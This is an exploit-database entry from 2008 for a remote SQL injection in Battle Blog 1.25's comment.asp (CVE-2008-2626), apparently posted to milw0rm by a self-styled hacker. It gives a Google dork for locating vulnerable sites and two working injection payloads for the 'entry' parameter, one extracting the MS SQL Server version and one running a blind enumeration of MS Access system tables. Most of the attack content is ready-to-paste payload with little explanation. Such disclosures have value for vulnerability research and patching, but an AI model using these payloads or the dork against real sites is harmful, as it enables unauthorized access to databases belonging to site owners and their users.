Battle Blog <= 1.25 comment.asp Remote SQL Injection Vulnerability

2008-06-03T00:00:00
ID EDB-ID:5731
Type exploitdb
Reporter Bl@ckbe@rD
Modified 2008-06-03T00:00:00

Description

Battle Blog <= 1.25 (comment.asp) Remote SQL Injection Vulnerability. CVE-2008-2626. Webapps exploit for php platform

                                        
                                            +************************************************************************************************************************+
| hhh  hhh          aa          ccccccc      kk  k      EEEEEEEE       RRRR                    TTTTTTTT      NNN   NN    |
| hhh  hhh        aa  aa        cc           kk k       E              RR  R    -----------       TT         NN N  NN    |
| hhhhhhhh       aaaaaaaa       cc           kkk        EEEEEEE        RR R     -----------       TT         NN  N NN    |
| hhh  hhh     aa       aa      cc           kk k       E              RR  R                      TT         NN   NNN    |
| hhh  hhh    aa         aa     ccccccc      kk  k      EEEEEEE        RR   R                     TT         NN    NN    |
|                                                                                                                        |
+************************************************************************************************************************+

[+] Script Name    : Battle Blog &lt;= V 1.25

[+] Script In Short: ('Battle Blog's "real world" preview feature allows you to view your posting within the actual context of your presentation and customized style sheet before you've published it, or, while you're making edits to a current entry.');

[+] Found by       : Bl@ckbe@rD ('Tunisian TerrorisT') ;

[+] Google dork    : "Powered by Battle Blog" ;

[+] Script URL     : webscripts.softpedia.com/script/Blog/Battle-Blog--31261.html ;

[+] Contact        : blackbeard-sql[A.T]hotmail{.}fr ;

--//--&gt;

[+] Expl0iT :

/comment.asp?entry={SQL}

-----&gt; For MS SQL Server         : 22+and+1=convert(int,(select+@@version))--

-----&gt; For Ms ACCESS (Blind-Way) : IIF((select%20mid(last(Name),1,1)%20from%20(select%20top%2010%20Namee%20from%20MSysObjects))='a',0,'done')%00

--//--&gt;

[+] GrEEtZ : allah , hak3r-b0y , UnderZ0ne Crew , InjEct0rS Team 

# milw0rm.com [2008-06-03]